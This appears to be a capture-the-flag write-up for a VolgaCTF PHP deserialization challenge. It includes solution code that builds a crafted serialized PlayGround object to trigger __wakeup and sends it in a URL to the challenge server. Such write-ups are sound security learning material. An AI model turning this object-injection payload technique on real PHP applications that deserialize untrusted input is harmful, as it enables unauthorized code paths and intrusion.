This challenge requires a serialized PHP object to be setup such that the conditions are met to output the flag. The PlayGround class uses the __wakeup magic method. This method is run as soon as the object is deserialized. To output the flag, the object must be set with properties that contains an object that responds to the runMe method and returns a truthy value. An instance of the First class was used to fill all 3 properties and get the flag.
<?php
class First{
public $flag;
public function runMe(){
return $this->flag;
}
}
class PlayGround{
public function __construct(){
$this->first = new First();
$this->second = new Second();
$this->third = new UnfinishedСlass();
}
public $first;
public $second;
public $third;
public function __wakeup(){
if ($this->first->runMe()){
if ($this->second->runMe()){
if ($this->third->runMe()){
echo 'VolgaCTF{your flag}';
}
}
}
}
}
$x = new First();
$x->flag = true;
$p = new PlayGround();
$p->first = $x;
$p->second = $x;
$p->third = $x;
$payload = serialize($p);
echo "Go get the flag http://php.tasks.q.2023.volgactf.ru:8080/?payload=" . urlencode($payload);